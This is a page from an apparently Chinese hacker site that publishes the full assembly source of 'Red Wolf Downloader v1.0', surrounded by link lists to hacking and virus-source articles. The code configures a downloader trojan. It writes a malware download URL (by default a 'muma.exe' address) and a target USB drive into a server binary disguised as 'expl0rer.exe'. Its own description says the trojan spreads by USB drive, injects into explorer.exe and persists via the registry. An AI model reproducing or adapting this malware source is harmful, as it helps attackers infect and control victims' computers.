·	完美空间提供500M免费AS	04-10	·	企业安全之YY内网准入以	04-09
·	企业安全之意识与策略	04-09	·	剑走偏锋:IIS漏洞利用	04-09
·	我来免费网提供100M免费	04-09	·	1122mb.com提供20G超大免	04-08
·	映像劫持与反劫持技术	04-07	·	让所有"暴力删除工具"无	04-07
·	入侵88red系统的详细过程	04-07	·	Sql Injection脚本注入终	04-07
·	vbs+delphi 反弹后门生成	04-07	·	飞讯网提供100MB免费PHP	04-07
·	突破SQL注入攻击时输入框	04-04	·	结合内核和病毒技术的最	04-04
·	Real Player rmoc3260.d	04-04	·	亿万网络今月最后为您提	04-04
·	php+mysql 5 sql inject	04-03	·	Real Player rmoc3260.d	04-03
·	oblog文件下载漏洞	04-03	·	免费啦提供1G-2G免费全能	04-03
·	完全解析网页后门和挂马	04-02	·	一句话开3389（只测试过	04-02
·	萧萧免费空间网提供100M	04-02	·	谷道免费空间网提供1G免	04-01
·	从本地入手解决双线路由	03-31	·	sablog 1.6 多个跨站漏洞	03-31
·	富文本编辑器的跨站脚本	03-31	·	Cookie注入是怎样产生的	03-31

[推荐]红狼下载者v1.0源代码

热荐 ★★★★★

红狼下载者v1.0源代码

文章整理发布：黑客风云文章来源：www.05112.com 更新时间：2007-1-26 9:54:51

;******************************************************
;程序编写by Asm
;日期：2006-12-25日凌晨
;出处：http://www.wolfexp.net/（红狼安全小组）
;注意事项：如欲转载，请保持本程序的完整，并注明：
;转载自红狼安全小组(http://www.wolfexp.net/)
;******************************************************
.386
.model flat, stdcall
option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include shell32.inc
includelib shell32.lib
ModifyFile PROTO :LPSTR ;函数声明
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Equ 等值定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
ICO_MAIN equ 1000h ;图标
DLG_MAIN equ 1
IDC_URL equ 1001
IDC_U equ 1002
IDC_About equ 1003
IDC_Out equ 1004
IDC_Wolf equ 1005
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data?
hInstance dd ?
hWindow dd ?
hFile dd ?
hMap dd ?
pMapAddr dd ?
.data
szUrl db 156 dup(0)
szU db 156 dup (0)
FileName db 'expl0rer.exe',0
szText db '下载者配制成功！',0
szCaption db '恭喜',0
szCI db 'G:\',0
szMuma db 'http://www.wolfexp.exe/muma.exe',0
szSury db '你总该输入点什么东西吧 ^_^',0
szAbout db '这个下载者通过U盘传播，至于传播的U盘分区则是自己选择，H:\或者G:\，默认是H:\',0dh
db '注入explorer.exe进程，无dll，注册成注册表启动。可能在下个版本设置成系统服务的方式',0dh
db '如果你有什么好的建议，可以到红狼安全小组找我讨论',0dh
db '程序编写by Asm 红狼安全小组[C.R.S.T]',0dh,0ah,0
szTit db '关于工具的一点说明',0
szWolf db 'http://www.wolfexp.net/',0
szErorr db '没有找到原始服务端，无法进行配置！',0
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 代码段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_Process proc
local @stFindFile:WIN32_FIND_DATA
invoke FindFirstFile,addr FileName,addr @stFindFile ;查找是否有服务端
.if eax == INVALID_HANDLE_VALUE
invoke MessageBox,NULL,addr szErorr,NULL,MB_OK
.elseif
invoke CreateFile,addr FileName,GENERIC_READ or GENERIC_WRITE,\ ;打开它
FILE_SHARE_READ or FILE_SHARE_WRITE,NULL,OPEN_EXISTING, \
FILE_ATTRIBUTE_NORMAL,NULL
.if eax!=INVALID_HANDLE_VALUE
mov hFile, eax ;保存句柄
invoke CreateFileMapping,hFile,NULL,PAGE_READWRITE,0,0,NULL ;建立内存共享
.if eax!=NULL
mov hMap,eax ;保存句柄
invoke MapViewOfFile,hMap,FILE_MAP_WRITE,0,0,NULL ;读取内存共享
.if eax!=NULL
mov pMapAddr,eax ;保存句柄
invoke ModifyFile,pMapAddr ;修改服务端内存里内容
invoke UnmapViewOfFile,pMapAddr ;解除文件映射
.endif
invoke CloseHandle,hMap ;关闭内存映射文件
.endif
invoke CloseHandle,hFile ;关闭文件
.endif
.endif
ret
_Process endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
ModifyFile proc uses ebx esi edi,lpBufferAddress:LPSTR
mov edi,lpBufferAddress ;得到内存地址
add edi,0010a0h ;得到要写入的U盘分区的地址
invoke lstrcpy,edi,addr szU ;修改edi地址处的内容为szU所保存的
xor edi,edi ;清空这个edi，免得物理内存地址重复
mov edi,lpBufferAddress ;重新得到内存地址
add edi,001a24h ;得到要写入的木马的地址
invoke lstrcpy,edi,addr szUrl ;修改edi地址处的内容为szUrl所保存的
invoke MessageBox,NULL,addr szText,addr szCaption,MB_OK ;提示配置成功
ret
ModifyFile endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ProcDlgMain proc uses ebx edi esi hWnd,wMsg,wParam,lParam
mov eax,wMsg
.if eax == WM_CLOSE
invoke EndDialog,hWnd,NULL
.elseif eax == WM_INITDIALOG
invoke LoadIcon,hInstance,ICO_MAIN
invoke SendMessage,hWnd,WM_SETICON,ICON_BIG,eax
invoke SetDlgItemText,hWnd,IDC_URL,addr szMuma
invoke SetDlgItemText,hWnd,IDC_U,addr szCI
.elseif eax == WM_COMMAND
mov eax,wParam
.if ax == IDOK
invoke GetDlgItemText,hWnd,IDC_URL,addr szUrl,sizeof szUrl
invoke GetDlgItemText,hWnd,IDC_U,addr szU,sizeof szU
invoke lstrlen,addr szUrl
.if ax == NULL
invoke MessageBox,NULL,addr szSury,NULL,MB_OK
.elseif
call _Process
.endif
.elseif ax == IDC_About
invoke MessageBox,NULL,addr szAbout,addr szTit,MB_OK
.elseif ax == IDC_Out
invoke ExitProcess,NULL
.elseif ax == IDC_Wolf
invoke ShellExecute,0,0,addr szWolf,0,0,SW_SHOW
.endif
.else
mov eax,FALSE
ret
.endif
mov eax,TRUE
ret

_ProcDlgMain endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start:
invoke GetModuleHandle,NULL
mov hInstance,eax
invoke DialogBoxParam,hInstance,DLG_MAIN,NULL,offset _ProcDlgMain,NULL
invoke ExitProcess,NULL
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
end start

文章录入：cainiaowang 责任编辑：cainiaowang

上一篇文章：熊猫烧香核心源码-Delphi编程

下一篇文章： TCP端口扫描的ASP实现

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

VIP 专区

利用BCB自己打造QQ炸弹	10-23
从内存中加载并启动一个exe(delp	09-27
开启和关闭Windows xp 防火墙(de	09-27
让你的程序通过XP防火墙(delphi编	09-27
如何让你的程序安全通过windows防	08-20
如何透过程序来控制 Windows (XP	08-20
动易2005-2006算号器的源代码	08-11
API对注册表进行操作(Delphi编程	07-30
一段隐藏注册表项的代码	07-26
了解VB编写病毒的大体方法	07-02
每秒4W的DDOS源码	06-08
从内存中加载并启动一个exe(Delp	06-05